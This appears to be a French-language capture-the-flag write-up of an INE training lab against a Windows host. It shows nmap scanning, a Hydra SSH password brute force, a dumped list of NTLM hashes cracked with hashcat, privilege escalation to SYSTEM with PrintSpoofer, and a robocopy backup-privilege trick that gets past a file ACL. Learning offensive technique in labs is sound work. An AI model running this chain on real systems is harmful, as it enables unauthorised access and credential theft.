Completing Skill Check Labs
Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you've gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you've learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.
Lab Environment
A target machine is accessible at target.ine.local. Identify the services and capure the flags.
- Flag 1: An insecure ssh user named alice lurks in the system.
- Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
- Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?
- Flag 4: Looks like the flag present in the Administrator's home denies direct access.
The following will be useful:
Wordist: /usr/share/wordlists/metasploit/unix_passwords.txt
Tool: /root/Desktop/PrintSpoofer.exeTools
Nmap (scan ports) Hydra (brute force) JohnTheRipper (hash) PrintSpoofer (post-exploitation tool used to escalate privileges on Windows systems by exploiting the SeImpersonatePrivilege through weaknesses in the Print Spooler service.)
Nmap scan :
p_notes.txt :
cat p_notes.txt
# Nmap 7.94SVN scan initiated Sat Jan 17 23:51:19 2026 as: nmap -p- -oN p_notes.txt -v target.ine.local
Nmap scan report for target.ine.local (10.3.21.43)
Host is up (0.0028s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49167/tcp open unknown
49182/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Jan 17 23:51:37 2026 -- 1 IP address (1 host up) scanned in 18.01 secondsn_notes.txt :
# Nmap 7.94SVN scan initiated Sat Jan 17 23:53:04 2026 as: nmap -p22,135,139,445,3389 -oN n_notes.txt -sC -sV -v target.ine.local
Nmap scan report for target.ine.local (10.3.21.43)
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2026-01-17T18:24:17+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-GQ7PTVEC6HL
| Issuer: commonName=WIN-GQ7PTVEC6HL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-16T18:16:26
| Not valid after: 2026-07-18T18:16:26
| MD5: c97d:1d22:d4d3:dd1d:bc37:845f:9a4c:8964
|_SHA-1: 7bce:9ba7:5d93:6b10:b6e6:7532:9ea3:0cf2:d03c:6e7f
| rdp-ntlm-info:
| Target_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Domain_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Computer_Name: WIN-GQ7PTVEC6HL
| DNS_Domain_Name: WIN-GQ7PTVEC6HL
| DNS_Computer_Name: WIN-GQ7PTVEC6HL
| Product_Version: 6.3.9600
|_ System_Time: 2026-01-17T18:24:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-17T18:24:11
|_ start_date: 2026-01-17T18:16:24
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 17 23:54:17 2026 -- 1 IP address (1 host up) scanned in 73.13 secondsRemarques : La machine vulnérable est une machine windows, Dans le cas d'un test d'intrusion on devra tester tous les ports. Cela dit, le flag1 nous indique directement une direction.
Flag 1: An insecure ssh user named alice lurks in the system.
via hydra, brute force le mot de passe en utilisant la bibliothèque suivante : /usr/share/wordlists/metasploit/unix_passwords.txt
hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt target.ine.local ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-18 00:04:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking ssh://target.ine.local:22/
[22][ssh] host: target.ine.local login: alice password: princess1creds suivant : alice:princess1.
Post Exploitation Methodology :
Local enumeration :
System information :
Whoami /priv : pas de plein de privilège.
C:\Users\alice>Whoami /priv
PRIVILEGES INFORMATION
- - - - - - - - - - -
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWhoami : utilisateur utilisé.
alice@WIN-GQ7PTVEC6HL C:\Users\alice>Whoami
win-gq7ptvec6hl\aliceNet users : liste utilisateurs.
alice@WIN-GQ7PTVEC6HL C:\Users\alice>net users
User accounts for \\WIN-GQ7PTVEC6HL
-------------------------------------------------------------------------------
Administrator alice bonney
brock broody calvin
casey charlie charlot
chloe colin david
derek dexter elizabeth
Guest haley harry
jake jerry john
karen larry laura
molly paul ruthy
sabrina sherry ssm-user
timothy warren william
The command completed successfully.Net localgroup : lister groupes.
alice@WIN-GQ7PTVEC6HL C:\Users\alice>Net localgroup
Aliases for \\WIN-GQ7PTVEC6HL
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Users
*WinRMRemoteWMIUsers__
The command completed successfully.Enum network :
alice@WIN-GQ7PTVEC6HL C:\Users\alice>Netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 804
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 596
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1368
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 400
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 720
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 332
TCP 0.0.0.0:49167 0.0.0.0:0 LISTENING 488
TCP 0.0.0.0:49182 0.0.0.0:0 LISTENING 496
TCP 10.3.21.43:22 10.10.48.4:44593 ESTABLISHED 804
TCP 10.3.21.43:22 10.10.48.4:46666 ESTABLISHED 804
TCP 10.3.21.43:139 0.0.0.0:0 LISTENING 4
TCP 10.3.21.43:49213 10.3.20.31:443 ESTABLISHED 2260
TCP 10.3.21.43:49386 169.254.169.254:80 TIME_WAIT 0
TCP 10.3.21.43:49391 10.3.18.165:443 ESTABLISHED 2260
TCP [::]:22 [::]:0 LISTENING 804
TCP [::]:135 [::]:0 LISTENING 596
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 1368
TCP [::]:49152 [::]:0 LISTENING 400
TCP [::]:49153 [::]:0 LISTENING 688
TCP [::]:49154 [::]:0 LISTENING 720
TCP [::]:49155 [::]:0 LISTENING 332
TCP [::]:49167 [::]:0 LISTENING 488
TCP [::]:49182 [::]:0 LISTENING 496
UDP 0.0.0.0:500 *:* 720
UDP 0.0.0.0:3389 *:* 1368
UDP 0.0.0.0:4500 *:* 720
UDP 0.0.0.0:5355 *:* 840
UDP 10.3.21.43:137 *:* 4
UDP 10.3.21.43:138 *:* 4
UDP [::]:500 *:* 720
UDP [::]:3389 *:* 1368
UDP [::]:4500 *:* 720
UDP [::]:5355 *:* 840 Si on s'intéresse au CTF, le flag 2 nous indique qu'il y'a un fichier hashdump.txt dans le répertoire d'alice.
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of C:\Users\alice
01/17/2026 06:17 PM <DIR> .
01/17/2026 06:17 PM <DIR> ..
09/05/2020 07:55 AM <DIR> Contacts
09/05/2020 09:07 AM <DIR> Desktop
06/19/2024 11:42 AM <DIR> Documents
09/05/2020 09:11 AM <DIR> Downloads
09/05/2020 07:55 AM <DIR> Favorites
01/17/2026 06:17 PM 34 flag1.txt
06/20/2024 05:28 AM 2,416 hashdump.txt
09/05/2020 07:55 AM <DIR> Links
09/05/2020 07:55 AM <DIR> Music
09/05/2020 07:55 AM <DIR> Pictures
09/05/2020 07:55 AM <DIR> Saved Games
09/05/2020 07:55 AM <DIR> Searches
09/05/2020 07:55 AM <DIR> Videos
2 File(s) 2,450 bytes
13 Dir(s) 361,971,712 bytes free Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
alice@WIN-GQ7PTVEC6HL C:\Users\alice>type hashdump.txt
alice:1015:aad3b435b51404eeaad3b435b51404ee:8883a4229c5553c9cca6856a53011e4c:::
bonney:1035:aad3b435b51404eeaad3b435b51404ee:281155baf68f6a9089146311a77d6d7c:::
brock:1037:aad3b435b51404eeaad3b435b51404ee:a45976f0c06a5d0b3e7223f05a76e4b5:::
broody:1022:aad3b435b51404eeaad3b435b51404ee:dc8c3ea7447407533af8575d0f3080bb:::
calvin:1036:aad3b435b51404eeaad3b435b51404ee:bed709ba1a1a570d47c8993f7b812ee8:::
casey:1040:aad3b435b51404eeaad3b435b51404ee:7e1718a7e439f61441d35f72e3b93da6:::
charlie:1029:aad3b435b51404eeaad3b435b51404ee:d481400542588758a2d37d9267a8ecf5:::
charlot:1038:aad3b435b51404eeaad3b435b51404ee:388df8e543c27c6c8498aee58198ebce:::
chloe:1018:aad3b435b51404eeaad3b435b51404ee:037c2978b606bafb2e1495a0e6de3180:::
colin:1020:aad3b435b51404eeaad3b435b51404ee:59b1564a32d45f7f9ab4f206e816b19f:::
david:1016:aad3b435b51404eeaad3b435b51404ee:ca8e025e9893e8ce3d2cbf847fc56814:::
derek:1032:aad3b435b51404eeaad3b435b51404ee:811f3a3aa4e96d4012229452a706828e:::
dexter:1043:aad3b435b51404eeaad3b435b51404ee:a85472bce5f04a9e464a4d2ec20f862f:::
elizabeth:1031:aad3b435b51404eeaad3b435b51404ee:f3c4214c99bb438ad82de744cb1d276c:::
haley:1030:aad3b435b51404eeaad3b435b51404ee:05cd20309cacd9d5680f78e6a59d578c:::
harry:1041:aad3b435b51404eeaad3b435b51404ee:ec628349a07c8bff5e81c497732f852c:::
jake:1026:aad3b435b51404eeaad3b435b51404ee:00d1b39ee2d85c0bdef9c3817c8fa090:::
jerry:1044:aad3b435b51404eeaad3b435b51404ee:17cb234cb58cd6b74e33013e46f1b12e:::
john:1017:aad3b435b51404eeaad3b435b51404ee:249934368a06559767bcbbc8a2596044:::
karen:1034:aad3b435b51404eeaad3b435b51404ee:079f7e374681d9394fd560ed11f6a212:::
larry:1039:aad3b435b51404eeaad3b435b51404ee:035c7acd2a04ad7a11df400b1933c4fc:::
laura:1028:aad3b435b51404eeaad3b435b51404ee:34c1da107e8abe2f4045dc6b9a0fb4d3:::
molly:1033:aad3b435b51404eeaad3b435b51404ee:3502da9acfd4b961e9baf41d784c7f2d:::
paul:1027:aad3b435b51404eeaad3b435b51404ee:ab7de9a600e3f6cd702e5dd46b026790:::
ruthy:1021:aad3b435b51404eeaad3b435b51404ee:f395f60844e01192225addcea30a29a4:::
sabrina:1042:aad3b435b51404eeaad3b435b51404ee:ad127b19268ac373645905190411637e:::
sherry:1025:aad3b435b51404eeaad3b435b51404ee:bf725db5fbddd83f98772c783d01507f:::
timothy:1024:aad3b435b51404eeaad3b435b51404ee:852939286b8c258ad0aeb103870d05f4:::
warren:1023:aad3b435b51404eeaad3b435b51404ee:ab21fb0a04f9d04eb56b2a274fa3b128:::
william:1019:aad3b435b51404eeaad3b435b51404ee:259e57531549fef4486d6a77285197b2:::Le hash de l'utilisateur bonny est 281155baf68f6a9089146311a77d6d7c. L'OS windows, stock ces mots de passes via la base de donnée SAM(Security Accounts Manager), et utilise NTLM ou LM comme protocole et LM est connu comme ancien et faible en sécurité. Pour en savoir plus https://www.janbasktraining.com/community/cyber-security/lm-vs-ntlm-whats-the-difference.
Pour plus parler du hashdump, le 3eme champ correspond au LM hash et le 4eme champ, qui n'est pas le même pour tous, est le NTLM hash.
J'ai pas réussi à cracker le mot de passe de Bonny, je vais essayer de tout cracker.
Pour cela extraction 4eme champ via la commande cut :
cut -d ":" -f 4 hashdump.txt > ntlm_hashes.txtPuis exécuter la commande suivante : (voir https://hashcat.net/wiki/doku.php pour le mode hash utilisé)
hashcat -a 0 -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD EPYC 7642 48-Core Processor, 47215/94495 MB (16384 MB allocatable), 48MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 30 digests; 30 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 13 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
8883a4229c5553c9cca6856a53011e4c:princess1
ca8e025e9893e8ce3d2cbf847fc56814:orange
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: ntlm_hashes.txt
Time.Started.....: Sun Jan 18 00:54:57 2026 (4 secs)
Time.Estimated...: Sun Jan 18 00:55:01 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3904.1 kH/s (3.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/30 (6.67%) Digests (total), 2/30 (6.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2a6272696467657330312a] -> $HEX[042a0337c2a156616d6f732103]
Started: Sun Jan 18 00:54:55 2026
Stopped: Sun Jan 18 00:55:01 2026creds trouvés :
- alice:princess1
- david:orange
Après connection au compte de David, recup le flag2.
Privilège Escalation :
J'ai choisi l'utilisation de winpeas.exe(/usr/share/peass/winpeas/winPEASx64.exe), pour le télécharger rien de plus simple, l'utilisation de scp via ssh est le plus simple.
scp winPEASx64.exe david@target.ine.local:"C:\Temp"
david@target.ine.local's password:
winPEASx64.exe Une fois récupérer, on pourra lancer via .\winPEASx64.exe log=resultats.txt. Une fois la commande exécuter, on enverra le fichier output vers notre machine Kali.
scp david@target.ine.local:C:/Temp/resultats.txt .J'ai remarqué un problème de couleur après exécution du processus via session ssh, maintenant qu'elle est sur notre machine attaquante, less -r va permettre à la machine à interpréter et renvoyer les bonnes couleurs qui correspondent.
Je remarque après avoir consulté les privilèges de david, un cas connu d'usurpation de token SeImpersonatePrivilege via PrintSpoofer.
https://github.com/itm4n/PrintSpoofer
david@WIN-GQ7PTVEC6HL C:\Users\david>Whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PrintSpoofer.exe -i -c cmd
C:\Windows\system32>Whoami
nt authority\system
C:\Windows\system32>Whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ============================================= =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled- Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?
Après avoir copier-coller le dernier flag, même si on est nt authority\system, l'ACL (Access Control List) bloque pour accéder au répertoire C:\Users\Administrator\flag.
C:\Users\Administrator>cd flag
Access is denied. SeBackup, va nous permettre d'ignorer les privilèges pour créer des sauvegardes du fichier ou répertoire.
robocopy C:\Users\Administrator\flag C:\Temp flag4.txt /b
Type flag4.txt